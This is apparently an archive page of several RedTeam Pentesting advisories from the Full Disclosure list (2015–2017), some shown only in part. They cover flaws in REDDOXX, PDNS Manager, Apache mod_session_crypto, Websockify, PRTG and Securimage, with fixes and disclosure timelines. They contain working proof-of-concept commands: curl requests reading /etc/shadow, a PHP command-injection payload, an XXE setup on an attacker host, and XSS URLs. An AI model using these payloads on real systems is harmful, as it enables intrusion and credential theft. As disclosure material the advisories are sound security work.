Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=====

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of ou

[FD] [RT-SA-2017-006] Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
uot;method":"FileTransfer.GetDirectoryList","params":{"Directory": "/etc/"}}' \
'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"
"xml"
"initramfs-tools"
"sysctl.d"
"pear"
"sudoers.d"
"cron.monthly"
"rc5.d"
"init"
"byobu"
"pki"
"xpdf"
"cron.weekly"
"snmp"
"ld.so.conf.d"
[...]


Since the process handling the requests runs with root privileges, it
was also possible to read the contents of the file "/etc/passwd":


$ curl --silent --data-binary '{"id":"{----}",'\
'"method":"FileTransfer.DownloadFile","params":{"FileName": "/etc/shadow",'\
'"Sequence": 1,"ChunkSize": 1}}' 'http://www.example.com/RdxEngine/json' \
| jq -r .result.ChunkData | tr -d '\r\n' | base64 -d
root:$6$$YYY[...]:14993:0:9:7:::
daemon:*:16652:0:9:7:::
bin:*:16652:0:9:7:::
sys:*:16652:0:9:7:::
sync:*:16652:0:9:7:::
games:*:16652:0:9:7:::
man:*:16652:0:9:7:::
lp:*:16652:0:9:7:::
mail:*:16652:0:9:7:::
news:*:16652:0:9:7:::
uucp:*:16652:0:9:7:::
proxy:*:16652:0:9:7:::
www-data:*:16652:0:9:7:::
backup:*:16652:0:9:7:::
list:*:16652:0:9:7:::
irc:*:16652:0:9:7:::
gnats:*:16652:0:9:7:::
nobody:*:16652:0:9:7:::
libuuid:!:16652:0:9:7:::
syslog:*:16652:0:9:7:::
messagebus:*:16899:0:9:7:::
sshd:*:16899:0:9:7:::
vboxadd:!:16899::
statd:*:16899:0:9:7:::
admin:$1$$ZZ:14054:0:9:7:::
clamav:!:16899:0:9:7:::
ntp:*:16899:0:9:7:::
hacluster:!:16899:0:9:7:::
firebird:*:16899:0:9:7:::
redis:!:16899:0:9:7:::
snmp:*:16899:0:9:7:::
bind:*:16899:0:9:7:::
smbadmin:!:17037:0:9:7:::
smbuser:!:17037:0:9:7:::



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

Attackers with access to a REDDOXX appliance are able to retrieve
directory listings and content of arbitrary files. Although this
vulnerability requires attackers to submit a valid session ID, the
vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3]
show how this requirement can be fulfilled even by attackers without
valid credentials. Additionally, the RdxEngine process handling the
requests to the vulnerable methods runs with root privileges, allowing
attackers to read any file on the filesystem and, for example, extract
the local user hashes for offline brute-force attacks. This
vulnerability is therefore rated as a high risk.


Timeline


2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpBH4vRevbt9.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-004] Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System 
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:104:65534::/var/lib/nfs:/bin/false
admin:x:0:0:admin,,,:/home/admin:/opt/reddoxx/local/scripts/admin.sh
clamav:x:105:111::/var/lib/clamav:/bin/false
ntp:x:106:112::/home/ntp:/bin/false
hacluster:x:107:113:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
firebird:x:108:114:Firebird Database Administator,,,:/var/lib/firebird:/bin/bash
redis:x:109:115:redis server,,,:/var/lib/redis:/bin/false
snmp:x:110:116::/var/lib/snmp:/bin/false
bind:x:111:117::/var/cache/bind:/bin/false
smbadmin:x:1001:1001::/home/smbadmin:/bin/false
smbuser:x:1002:1002::/home/smbuser:/bin/false



Workaround
==

None


Fix
===

Update the appliance software to Version 2032 SP2.


Security Risk
=

This vulnerability can be used by attackers to download arbitrary files
if the filename and path is known from filesystems reachable on the
appliance. Depending on the configuration of the appliance, attackers
can read the credentials stored in the configuration files or extract
session IDs from log files. There are also no authentication checks in
place. Therefore, the vulnerability poses a high risk.


Timeline


2017-05-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-003


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpPQzktKAO7w.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-003] Cross-Site Scripting in REDDOXX Appliance

2017-07-24 Thread RedTeam Pentesting GmbH
5-16 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-06-21 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released


References
==

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
    (Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpCbdm6So3Ns.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-011] Remote Command Execution in PDNS Manager

2017-07-05 Thread RedTeam Pentesting GmbH
---

To bypass the problem that the addslashes() function prevents the usage
of single or double quotes for the GET variable name, it was instead
encoded with the chr() function and decodes to the string "cmd".

PDNS Manager since Git commit 3bf4e28[1] from 12 December 2016 uses the
PHP PDO class for establishing a database connection. Since the PDO
class is quite liberal in what it accepts in its Data Source Name
parameter, the configuration parameters as shown above are accepted and
allow for a valid database connection, as the additional data in the
"port" parameter is ignored by the PDO class. Finally, the file
config/config-user.php will be written with the following content:


http://example.com/config/config-user.php?cmd=uname%20-a



Proof of Concept


1. Check if install.php is still available and can be used to write a new
configuration by visiting the following URL:

http://example.com/install.php

2. Set up a database that PDNS Manager can connect to.

3. Send an HTTP POST request with a manipulated "port" parameter, e.g.


curl -H 'Content-Type: application/json' --data \
'{"host":"attacker-system.example.com", \
"user":"root", \
"password":"secret", \
"database":"pdnsdb", \
"port":"3306;system($_GET[chr(99).chr(109).chr(100)])", \
"userName":"administrator", \
"userPassword":"password", \
"type":"mysql"}' \
http://example.com/api/install.php


4. Run arbitrary commands:


http://example.com/config/config-user.php?cmd=uname%20-a



Workaround
==

Ensure that config/config-user.php exists.


Fix
===

The problem was fixed in the Git master branch in commit ccc4232[2].
Alternatively, the stable version v1.2.1 and earlier are not affected.


Security Risk
=

The vulnerability is deemed to be of medium risk. The number of
installations that are configured in the way described should be rather
low, as it is not the recommended way of installing PDNS Manager and the
development version of PDNS Manager needs to have been used. However, if
such a configuration is found, arbitrary PHP code can be run on the
system. Depending on the system's configuration, this can lead to a full
compromise of the host running PDNS Manager.


Timeline


2017-05-16 Vulnerability identified
2017-06-16 Customer approved disclosure to vendor
2017-06-27 Vendor notified
2017-06-29 Vendor released fixed version
2017-07-05 Advisory released


References
==

[0] https://pdnsmanager.lmitsystems.de/
[1] 
https://github.com/loewexy/pdnsmanager/commit/3bf4e2874a0120d99ae02a1a9f4a6e74094c7dc1
[2] 
https://github.com/loewexy/pdnsmanager/commit/ccc423291cb0e6f8c58849f71821e7425b7c030e


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpmXlCKIC23e.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto

2016-12-23 Thread RedTeam Pentesting GmbH
the session data. The Python script can also be used to encrypt a new
session containing the username "admin":


$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\
Hztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\
RU= username=admin

Encrypted session:
sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY

real3m38.002s
users0m8.536s
sys0m0.512s



Sending this newly encrypted session to the server shows that the
username is now "admin":


$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\
zmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb

your username is admin



Workaround
==

Use a different means to store the session, e.g. in a database by using
mod_session_dbd.


Fix
===

Update to Apache HTTP version 2.4.25 (see [2]).


Security Risk
=

Applications which use mod_session_crypto usually store sensitive values
in the session and rely on an attacker's inability to decrypt or modify
the session. Successful exploitation of the Padding Oracle vulnerability
subverts this mechanism and allows to construct sessions with arbitrary
attacker-specified content. Depending on the application this may
completely subvert the application's security. Therefore, this
vulnerability poses a high risk.


Timeline


2016-01-11 Vulnerability identified
2016-01-12 Customer approved disclosure to vendor
2016-01-12 CVE number requested
2016-01-20 Vendor notified
2016-01-22 Vendor confirmed the vulnerability
2016-02-03 Vendor provided patch
2016-02-04 Apache Security Team assigned CVE number
2016-03-03 Requested status update from vendor, no response
2016-05-02 Requested status update from vendor, no response
2016-07-14 Requested status update and roadmap from vendor
2016-07-21 Vendor confirms working on a new released and inquired whether the
   patch fixes the vulnerability
2016-07-22 RedTeam confirms
2016-08-24 Requested status update from vendor
2016-08-29 Vendor states that there is no concrete timeline
2016-12-05 Vendor announces a release
2016-12-20 Vendor released fixed version
2016-12-23 Advisory released


References
==

[1] https://github.com/mwielgoszewski/python-paddingoracle
[2] http://httpd.apache.org/security/vulnerabilities_24.html


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgp5GLD783dxl.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-003] Less.js: Compilation of Untrusted LESS Files May Lead to Code Execution through the JavaScript Less Compiler

2016-11-24 Thread RedTeam Pentesting GmbH
compiler. This vulnerability can be exploited in
various scenarios: If an application takes user-input and feeds it to
the Less compiler, an attacker can gain code execution and compromise
the system running the Less compiler. If a user downloads and compiles a
malicious LESS file, an attacker can compromise the user's system.

RedTeam Pentesting discovered and exploited this vulnerability in a
penetration test. However, it became increasingly clear after
consultation with the LESS development team that the encountered
situation is likely relatively rare. The reason for that is that LESS
files are usually compiled on the server-side once and most often do not
contain user-supplied content. In cases where LESS files do contain or
consist of user-supplied content, the browser-based implementation [3]
of the Less compiler is the typical choice.

Still, the official Less documentation does not mention the compiler's
feature to evaluate inline JavaScript and the consequential risks. Thus,
users are likely to be unaware that embedding user-controlled content
into a LESS file may result in arbitrary code execution. Therefore,
RedTeam Pentesting decided to release this advisory, to bring the users'
attention to this important fact.


Timeline


2016-03-18 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-31 Customer approved disclosure to vendor
2016-06-24 Advisory sent to vendor
2016-07-05 Vendor debates whether it is a security issue or a
   documentation issue
2016-07-12 Vendor opts for waiting until release 3.0, which disables the
   option to compile JavaScript by default
2016-07-14 RedTeam downrates the vulnerability from high risk to low to
   acknowledge that it is more of a setup issue
2016-11-24 Still no release 3.0, advisory released


References
==

[0] https://github.com/less/less.js
[1] http://web.archive.org/web/20140202171923/http://www.lesscss.org/
[2] 
http://www.bennadel.com/blog/2638-executing-javascript-in-the-less-css-precompiler.htm
[3] http://lesscss.org/#client-side-usage


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpj1HSRn6sBL.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

2016-05-31 Thread RedTeam Pentesting GmbH
 phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability. The following
invocation of curl uploads the same PHP script which invokes the
function 'phpinfo()':

$ curl --silent --include --data '' \
'http://example.com/relay-1-5-3/upload.pl?redteam.php'

In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:

$ ls  relay-1-5-3/uploads/
stats_redteam.php.txt  temp_redteam.php

$ cat temp_redteam.php


Requesting this file with the URL
http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server e.g. in order to easily execute PHP
commands with the privileges of the web server.


Workaround
==

One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.


Fix
===

None.


Security Risk
=

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.


Timeline


2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published


References
==

[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpob3TUU2oVL.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: Websockify: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.


Details
===

Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"websockify was formerly named wsproxy and was part of the noVNC
project.

At the most basic level, websockify just translates WebSockets traffic
to normal TCP socket traffic. Websockify accepts the WebSockets
handshake, parses it, and then begins forwarding traffic between the
client and the target in both directions."

(from the project's readme)


More Details


For each new connection, websockify forks and calls the function
do_handshake() to receive a client's WebSocket handshake. The
following excerpt shows some of the source code responsible for
receiving the client's data from the socket file descriptor:



ws_ctx_t *do_handshake(int sock) {
char handshake[4096], response[4096], sha1[29], trailer[17];
[...]
offset = 0;
for (i = 0; i < 10; i++) {
len = ws_recv(ws_ctx, handshake+offset, 4096);
if (len == 0) {
handler_emsg("Client closed during handshake\n");
return NULL;
}
offset += len;
handshake[offset] = 0;
if (strstr(handshake, "\r\n\r\n")) {
break;
}
usleep(10);
}
[...]



As can be seen in the listing, the function ws_recv() is called in a
loop to read data from the client's socket into the stack-allocated
buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096
bytes are read from the socket and stored in the handshake buffer.
The variable 'offset' determines the position in the buffer at which
the received data is written. In each iteration, the value of 'offset'
is increased by the amount of bytes received. If the received data
contains the string "\r\n\r\n", which marks the end of the WebSocket
handshake data, the loop is terminated. Otherwise, the loop is
terminated after a maximum of 10 iterations. The do_handshake()
function returns early if no more data can be received from the
socket.

By forcing websockify to iterate multiple times, attackers can
exploit this behaviour to write data past the space allocated for the
handshake buffer, thereby corrupting adjacent memory.


Proof of Concept


The following curl command can be used to trigger the buffer overflow:

$ curl http://example.com/$(python -c 'print "A"*5000')

Providing a generic exploit for this vulnerability is not feasible, as
it depends on the server side environment websockify is used in as well
as the used compiler and its flags. However, during a penetration test
it was possible to successfully exploit this buffer overflow
vulnerability and to execute arbitrary commands on the server.

Workaround
==

Use the Python implementation of websockify.


Fix
===

The vulnerability has been fixed in commit 192ec6f [0].


Security Risk
=

Successful exploitation of the vulnerability allows attackers to execute
arbitrary code on the affected system. It is therefore rated as a high
risk.


Timeline


2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published


References
==

[0] 
https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany  

[FD] [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor

2016-05-31 Thread RedTeam Pentesting GmbH
Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor

Authenticated users who can create new HTTP XML/REST Value sensors in
PRTG Network Monitor can read local files on the PRTG host system via
XML external entity expansion.


Details
===

Product: Paessler PRTG Network Monitor
Affected Versions: 14.4.12.3282
Fixed Versions: 16.2.23.3077/3078
Vulnerability Type: XML External Entity Expansion
Security Risk: medium
Vendor URL: https://www.paessler.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-012
Advisory Status: published
CVE: CVE-2015-7743
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7743


Introduction


"PRTG Network Monitor is the powerful and comprehensive network
monitoring solution from Paessler AG. It monitors your network using a
whole range of technologies and assures the availability of network
components and measures traffic and usage. PRTG saves costs by avoiding
outages, optimizing connections, saving time and controlling service
level agreements (SLAs)."

(from the vendor's website)[1]


More Details


An attacker with access to a PRTG Network Monitor account with
sufficient privileges to create or configure XML/REST sensors can read
files stored on the system's local disk. These sensors are intended to
query a URL and, depending on the configuration, check whether there is
a valid response or read the value of a specific XML node in the
document that is returned. This functionality is vulnerable to XML
external entity expansion.


Proof of Concept


In order to exploit this vulnerability an HTTP XML/REST Value sensor has
to be set up to access an attacker-controlled URL and to read the value
of a specific XML node, for example:

https://attacker.example.com/xeee-hosts.xml

The XML document "xeee-hosts.xml" contains an external entity that uses
the "SYSTEM" keyword to load a local file as the content of the "hosts"
entity:



]>


Since the XML parser of PRTG Network Monitor evaluates external
entities, the XML parser fetches the file

"C:\Windows\System32\drivers\etc\hosts"

from the disk of the local system and inserts its content into the
"root" node of the XML document. If the sensor is configured to return
the value of that "root" node, the contents of that file are displayed
in the web interface of PRTG Network Monitor. This discloses the
contents of the file to attackers which otherwise would not be able to
read local files.


Fix
===

Update to a version greater or equal to 16.2.23.3077/3078 (see [2]).


Security Risk
=

Attackers who can create new HTTP XML/REST sensors in PRTG Network
Monitor, are able to use the XML external entity expansion to read files
on the local system.  Depending on the data stored on the vulnerable
system, this vulnerability may pose a high risk. However, as attackers
are required to already have valid user credentials for the application,
the vulnerability is only rated to have a medium risk potential.


Timeline


2015-08-28 Vulnerability identified in PRTG Network Monitor
2015-09-04 Customer approved disclosure of vulnerability
2015-09-04 CVE ID requested
2015-09-24 CVE ID requested again
2015-10-07 CVE ID assigned
2015-10-21 Vendor contacted
2016-04-04 Vendor released fixed version
2016-05-31 Advisory released


References
==

[1] https://www.paessler.com
[2] https://www.paessler.com/prtg/history/stable


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27   Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer:   Patrick Hof, Jens Liebchen


pgpgv8JIaVg6x.pgp
Description: PGP signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2016-002] Cross-site Scripting in Securimage 3.6.2

2016-03-22 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Securimage 3.6.2

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Securimage CAPTCHA software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.


Details
===

Product: Securimage
Affected Versions: >= 3.2RC1
Fixed Versions: 3.6.4
Vulnerability Type: Cross-site Scripting
Security Risk: high
Vendor URL: https://www.phpcaptcha.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-002
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Securimage is an open-source free PHP CAPTCHA script for generating
complex images and CAPTCHA codes to protect forms from spam and abuse.
It can be easily added into existing forms on your website to provide
protection from spam bots. It can run on most any web server as long as
you have PHP installed, and GD support within PHP. Securimage does
everything from generating the CAPTCHA images to validating the typed
code. Audible codes can be streamed to the browser with Flash for the
vision impaired."

(from the project's homepage)


More Details


The Securimage download package and GitHub repository include several
example scripts to demonstrate the usage of the library. Among these
scripts is the file example_form.ajax.php. It returns JavaScript code
that includes an unencoded value from the variable $_SERVER['PHP_SELF']
directly embedded into the website.

In Securimage versions from 3.2RC1 to 3.5 the following code is
vulnerable:


function processForm()
{
new Ajax.Request('', {
method: 'post',
parameters: $('contact_form').serialize(),
onSuccess: function(transport) {


In Securimage versions from 3.5.2 to 3.6.2 the following code is
vulnerable:


function processForm()
{
jQuery.ajax({
url: '',
type: 'POST',
data: jQuery('#contact_form').serialize(),
dataType: 'json',
}).done(function(data) {


The problem here is that the value of the variable $_SERVER['PHP_SELF']
can, depending on the configuration of the web server, often be
manipulated by an attacker to include special characters like
apostrophes.


Proof of Concept


The following URL can be used to demonstrate the vulnerability for
Securimage versions from 3.2RC1 to 3.5 on with a vulnerable web server
configuration:

http://www.example.com/example_form.ajax.php/');}alert('RedTeam 
Pentesting');a=function(){a('

Securimage versions from 3.5.2 to 3.6.2 can be exploited with the
following URL:

http://www.example.com/example_form.ajax.php/'});}alert('RedTeam 
